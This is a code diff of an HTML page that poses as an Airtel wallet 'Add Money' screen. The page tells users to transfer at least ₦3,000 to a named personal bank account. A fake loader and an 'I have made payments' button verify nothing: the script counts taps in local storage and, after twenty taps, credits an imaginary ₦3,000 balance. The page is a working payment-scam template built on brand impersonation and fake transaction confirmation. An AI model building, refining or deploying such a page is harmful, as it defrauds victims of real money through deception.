--- a/add-money.html
+++ b/add-money.html
@@ -1,236 +1,205 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta charset="UTF-8">
-  <title>Add Money - Airtel Wallet</title>
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <meta charset="UTF-8" />
+  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
+  <title>Add Money</title>
   <style>
-    * {
-      box-sizing: border-box;
-      margin: 0;
-      padding: 0;
-      font-family: "Segoe UI", sans-serif;
-    }
-
     body {
-      background-color: #fff;
+      margin: 0;
+      font-family: 'Segoe UI', sans-serif;
+      background: #fff;
       overflow: hidden;
       position: relative;
-      min-height: 100vh;
     }
 
     .background {
-      position: absolute;
-      top: 0;
-      left: 0;
-      height: 100%;
+      position: fixed;
       width: 100%;
+      height: 100%;
       overflow: hidden;
-      z-index: 0;
+      z-index: -1;
     }
 
-    .logo-piece {
+    .background img {
       position: absolute;
-      width: 30px;
-      height: 30px;
-      background-image: url("airtel.png"); /* use your Airtel logo */
-      background-size: contain;
-      background-repeat: no-repeat;
-      animation: float 10s linear infinite;
-      opacity: 0.2;
+      width: 20px;
+      opacity: 0.1;
+      animation: float 15s linear infinite;
     }
 
     @keyframes float {
-      0% {
-        transform: translateY(100vh) rotate(0deg);
-      }
-      100% {
-        transform: translateY(-100vh) rotate(360deg);
-      }
+      from { transform: translateY(100vh) rotate(0deg); }
+      to { transform: translateY(-100vh) rotate(360deg); }
     }
 
     .container {
-      position: relative;
-      z-index: 1;
-      padding: 30px 20px;
+      padding: 20px;
+      max-width: 400px;
+      margin: 60px auto 0;
+      background: rgba(255, 255, 255, 0.8);
+      border-radius: 16px;
+      box-shadow: 0 0 20px rgba(255,0,0,0.1);
       text-align: center;
     }
 
-    .airtel-logo {
+    .logo {
       width: 100px;
       margin: 0 auto 20px;
+      display: block;
     }
 
-    h2 {
-      color: #d6001c;
-      margin-bottom: 20px;
-    }
-
-    input[type="number"] {
+    .input-amount {
       padding: 12px;
-      width: 100%;
-      max-width: 300px;
+      font-size: 18px;
+      width: 80%;
       border: 1px solid #ccc;
       border-radius: 10px;
       margin-bottom: 20px;
-      font-size: 16px;
     }
 
     .btn {
-      background-color: #d6001c;
-      color: white;
+      padding: 12px 20px;
+      font-size: 18px;
+      background: red;
+      color: #fff;
       border: none;
-      padding: 12px 24px;
-      border-radius: 30px;
-      font-size: 16px;
+      border-radius: 10px;
       cursor: pointer;
-      transition: background 0.3s;
     }
 
-    .btn:hover {
-      background-color: #b30019;
+    .hidden {
+      display: none;
     }
 
     .popup {
-      display: none;
-      position: fixed;
-      top: 30%;
-      left: 50%;
-      transform: translate(-50%, -50%);
-      background: white;
-      padding: 25px;
-      border-radius: 12px;
+      background: #fff;
+      padding: 20px;
+      border-radius: 10px;
       box-shadow: 0 0 15px rgba(0,0,0,0.2);
-      z-index: 9999;
-      text-align: center;
+      max-width: 300px;
+      margin: 30px auto;
     }
 
     .loader {
-      display: none;
-      margin: 20px auto;
-      border: 6px solid #f3f3f3;
-      border-top: 6px solid #d6001c;
-      border-radius: 50%;
-      width: 40px;
-      height: 40px;
-      animation: spin 1s linear infinite;
+      text-align: center;
+      margin-top: 30px;
+    }
+
+    .loader img {
+      width: 50px;
+      animation: spin 1.5s linear infinite;
     }
 
     @keyframes spin {
-      0% { transform: rotate(0deg); }
+      0% { transform: rotate(0); }
       100% { transform: rotate(360deg); }
     }
 
-    .account-section {
-      display: none;
+    .account-card {
+      margin-top: 30px;
+      background: #fff;
+      border-radius: 16px;
+      padding: 20px;
+      text-align: center;
+      box-shadow: 0 0 20px rgba(0,0,0,0.05);
+    }
+
+    .account-card h3 {
+      margin-bottom: 10px;
+    }
+
+    .dashboard-btn {
       margin-top: 30px;
       text-align: center;
     }
 
-    .account-box {
-      background: rgba(255, 255, 255, 0.8);
-      padding: 20px;
-      border-radius: 15px;
-      display: inline-block;
-      box-shadow: 0 4px 12px rgba(0,0,0,0.1);
-      margin-top: 20px;
+    .dashboard-btn button {
+      background: #444;
+      color: white;
+      padding: 10px 20px;
+      border-radius: 10px;
+      border: none;
+      font-size: 16px;
     }
 
-    .account-box p {
-      margin: 10px 0;
-      font-weight: bold;
-      color: #d6001c;
-    }
-
-    .back-btn {
-      margin-top: 30px;
-      display: inline-block;
-      color: #d6001c;
-      font-weight: bold;
-      text-decoration: underline;
-      cursor: pointer;
-    }
   </style>
 </head>
 <body>
 
-  <!-- Floating Background Logos -->
-  <div class="background" id="background"></div>
+  <div class="background" id="bg-animation"></div>
 
-  <div class="container">
-    <img src="airtel.png" alt="Airtel Logo" class="airtel-logo">
-    <h2>Add Money</h2>
-    <input type="number" id="amount" placeholder="Enter amount (min ₦3,000)">
-    <br>
-    <button class="btn" onclick="proceed()">Continue</button>
+  <div class="container" id="step1">
+    <img src="airtel-logo.png" class="logo" alt="Airtel Logo" />
+    <input id="amount" class="input-amount" type="number" placeholder="Enter amount (min ₦3000)" />
+    <button class="btn" onclick="handleContinue()">Continue</button>
+  </div>
 
-    <div class="loader" id="loader"></div>
-
-    <div class="account-section" id="accountDetails">
-      <img src="airtel.png" width="60" alt="Airtel">
-      <div class="account-box">
-        <p>Account Name: EMMANUEL OKWUNNA</p>
-        <p>Bank: SmartCash Payment Service Bank</p>
-        <p>Account Number: 812 489 0070</p>
-        <button class="btn" onclick="madePayment()">I Have Made Payments</button>
-      </div>
-      <div class="back-btn" onclick="goToDashboard()">← Back to Dashboard</div>
+  <div class="container hidden" id="loading">
+    <div class="loader">
+      <img src="airtel-logo.png" alt="Loading" />
+      <p>Please wait...</p>
     </div>
   </div>
 
-  <!-- Popup -->
-  <div class="popup" id="popup"></div>
+  <div class="container hidden" id="accountDetails">
+    <img src="airtel-logo.png" class="logo" />
+    <div class="account-card">
+      <h3>Transfer To:</h3>
+      <p><strong>Account Name:</strong> EMMANUEL OKWUNNA</p>
+      <p><strong>Bank:</strong> SmartCash Payment Service Bank</p>
+      <p><strong>Account Number:</strong> 812 489 0070</p>
+    </div>
+    <button class="btn" onclick="confirmPayment()">I have made payments</button>
+    <div class="dashboard-btn">
+      <button onclick="window.location.href='dashboard.html'">← Back to Dashboard</button>
+    </div>
+  </div>
 
   <script>
-    // Background floating logos
-    const bg = document.getElementById("background");
-    for (let i = 0; i < 40; i++) {
-      let logo = document.createElement("div");
-      logo.className = "logo-piece";
-      logo.style.left = Math.random() * 100 + "vw";
-      logo.style.animationDuration = (5 + Math.random() * 10) + "s";
-      bg.appendChild(logo);
+    const bg = document.getElementById("bg-animation");
+    for (let i = 0; i < 50; i++) {
+      const img = document.createElement("img");
+      img.src = "airtel-logo.png";
+      img.style.left = Math.random() * 100 + "%";
+      img.style.top = Math.random() * 100 + "%";
+      img.style.animationDuration = (5 + Math.random() * 10) + "s";
+      bg.appendChild(img);
     }
 
-    let tapCount = parseInt(localStorage.getItem('tapCount') || 0);
-    let balance = parseInt(localStorage.getItem('balance') || 0);
-
-    function showPopup(message) {
-      const popup = document.getElementById("popup");
-      popup.innerText = message;
-      popup.style.display = "block";
-      setTimeout(() => popup.style.display = "none", 3000);
-    }
-
-    function proceed() {
+    function handleContinue() {
       const amount = parseInt(document.getElementById("amount").value);
-      if (!amount || amount < 3000) {
-        showPopup("Please input a minimum of ₦3,000");
+      if (isNaN(amount) || amount < 3000) {
+        alert("Please input a minimum of ₦3000");
         return;
       }
 
-      document.getElementById("loader").style.display = "block";
+      document.getElementById("step1").classList.add("hidden");
+      document.getElementById("loading").classList.remove("hidden");
+
       setTimeout(() => {
-        document.getElementById("loader").style.display = "none";
-        document.getElementById("accountDetails").style.display = "block";
-      }, 2500);
+        document.getElementById("loading").classList.add("hidden");
+        document.getElementById("accountDetails").classList.remove("hidden");
+      }, 3000); // simulate loader
     }
 
-    function madePayment() {
-      tapCount++;
-      localStorage.setItem('tapCount', tapCount);
+    function confirmPayment() {
+      alert("Please wait, we are confirming your transaction...");
+      let taps = parseInt(localStorage.getItem("fundTaps")) || 0;
+      taps += 1;
 
-      showPopup("Please wait... We are confirming your transaction");
-
-      if (tapCount % 20 === 0) {
-        balance += 3000;
-        localStorage.setItem('balance', balance);
+      if (taps >= 20) {
+        // Fund wallet
+        let currentBalance = parseInt(localStorage.getItem("balance")) || 0;
+        currentBalance += 3000;
+        localStorage.setItem("balance", currentBalance);
+        localStorage.setItem("fundTaps", 0);
+        alert("₦3,000 has been added to your wallet!");
+      } else {
+        localStorage.setItem("fundTaps", taps);
       }
     }
-
-    function goToDashboard() {
-      window.location.href = "dashboard.html";
-    }
   </script>
+
 </body>
-</html>
+  </html>
